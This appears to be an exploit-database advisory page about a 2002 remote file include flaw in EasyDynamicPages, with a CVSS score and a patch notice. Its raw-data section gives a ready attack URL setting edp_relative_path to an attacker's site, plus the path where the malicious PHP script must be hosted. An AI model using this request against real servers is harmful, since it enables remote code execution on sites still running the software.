header-logo
Suggest Exploit
vendor:
EasyDynamicPages
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: EasyDynamicPages
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

EasyDynamicPages Remote File Include Vulnerability

EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This vulnerability allows an attacker to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software. The attacker must have a malicious script hosted at the following location: http://[attacker's_site]/admin/site_settings.php

Mitigation:

The vendor has released a patch to address this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9338/info

EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software. 

http://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://[attacker's_site]/

The attacker must have a malicious script hosted at the following location:

http://[attacker's_site]/admin/site_settings.php

Navigation

Suggest Exploit

Services By CQR